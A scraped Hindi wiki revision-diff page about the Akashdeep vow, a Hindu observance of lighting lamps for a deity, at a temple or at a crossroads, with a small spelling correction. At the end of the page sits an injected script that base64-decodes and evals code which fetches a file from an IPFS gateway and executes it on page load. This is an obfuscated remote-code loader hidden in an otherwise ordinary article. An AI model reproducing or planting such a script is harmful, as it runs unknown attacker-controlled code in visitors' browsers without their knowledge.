Difference between revisions of "आकाश दीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ते है।" to "ते हैं।")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*आकाशदीप व्रत में किसी [[देवता]] के लिए या किसी मन्दिर या किसी चौराहे पर घृत या तेल के दीप जलाये जाते हैं।<ref>अपरार्क (370-372, दीपदान); [[मनुस्मृति]] (4|29); राजमार्तण्ड (1351-57); निर्णयसिन्धु (195)।</ref>
 
*आकाशदीप व्रत में किसी [[देवता]] के लिए या किसी मन्दिर या किसी चौराहे पर घृत या तेल के दीप जलाये जाते हैं।<ref>अपरार्क (370-372, दीपदान); [[मनुस्मृति]] (4|29); राजमार्तण्ड (1351-57); निर्णयसिन्धु (195)।</ref>
  

Revision as of 16:24, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • akashadip vrat mean kisi devata ke lie ya kisi mandir ya kisi chaurahe par ghrit ya tel ke dip jalaye jate haian.[1]

tika tippani aur sandarbh

  1. aparark (370-372, dipadan); manusmriti (4|29); rajamartand (1351-57); nirnayasindhu (195).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>